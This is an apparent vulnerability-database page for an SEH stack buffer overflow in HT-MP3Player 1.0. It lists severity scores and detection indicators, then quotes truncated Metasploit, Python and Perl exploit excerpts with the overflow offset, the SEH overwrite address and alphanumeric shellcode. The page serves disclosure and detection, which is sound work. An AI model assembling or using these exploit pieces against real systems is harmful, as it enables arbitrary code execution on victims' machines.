CVE-2009-2485
published 2009-07-16CVE-2009-2485: Stack-based buffer overflow in HT-MP3Player 1.0 allows remote attackers to execute arbitrary code via a long string in a .ht3 file.
PriorityP348critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
58.10%
99.0th percentile
Stack-based buffer overflow in HT-MP3Player 1.0 allows remote attackers to execute arbitrary code via a long string in a .ht3 file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tingan | ht-mp3player | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Stack-based SEH buffer overflow triggered by a malicious .ht3 file; overflow occurs at offset 4108 bytes before the SEH record is overwritten. ↗
- →Exploit payload space is 4108 bytes; bad characters include null byte, LF, CR, and bytes 0x80–0xCF, requiring AlphanumMixed encoding — detect alphanumeric-encoded shellcode in .ht3 files. ↗
- →The exploit uses a pop/pop/ret gadget at 0x00406cff inside HTMP3Player.exe to pivot SEH execution; monitor for SEH-based exploitation of this process. ↗
- →Crash/exploitation can be detected by a read from address 0xf0f0f0f0 at offset 4096 within the .ht3 payload buffer. ↗
- →The file type .ht3 is not registered by the HT-MP3Player installer; a user must manually load the file, indicating a social-engineering delivery vector to watch for. ↗
- →Universal exploit prefixes payload buffer with the ASCII string 'D_Z' before shellcode; this marker can be used as a file-content signature for malicious .ht3 files. ↗
- ·The Metasploit module targets only HT-MP3Player 1.0 on Windows; no other versions or platforms are listed as targets. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2009-2485 HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)
HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)
---
##
# $Id: ht_mp3player_ht3_bof.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HT-MP3Player 1.0.
Arbitrary code execution could occur when parsing a specially crafted
.HT3 file.
NOTE: The player installation does not register the file type to be
handled. Therefore, a user must take extra steps to load this file.
}
Exploit-DB
HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)
exploitdb·2009-06-29
CVE-2009-2485 HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)
HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)
---
#usage: exploit.py
print "**************************************************************************"
print " HT-MP3Player 1.0 (.ht3) Universal Buffer Overflow (SEH)\n"
print " Original author: hack4love<=(my friend)\n"
print " Universal exploit : His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: All friends (DZ),sec-r1z.com\n"
print "**************************************************************************"
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
Exploit-DB
HT-MP3Player 1.0 - '.ht3' Local Buffer Overflow (SEH)
exploitdb·2009-06-29
CVE-2009-2485 HT-MP3Player 1.0 - '.ht3' Local Buffer Overflow (SEH)
HT-MP3Player 1.0 - '.ht3' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# HT-MP3Player 1.0 (.ht3 File) Local buffer Overflow (seh)
# # Greetz to all my friends
# form egypt
## easy :d
## Tested on: Windows XP Pro SP2 (EN)
##########################################################
my $bof="\x41" x 4108;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xbe\x2e\xd1\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x
Metasploit
HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow
metasploit
HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow
HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow
This module exploits a stack buffer overflow in HT-MP3Player 1.0. Arbitrary code execution could occur when parsing a specially crafted .HT3 file. NOTE: The player installation does not register the file type to be handled. Therefore, a user must take extra steps to load this file.
No writeups or analysis indexed.
2009-07-16
Published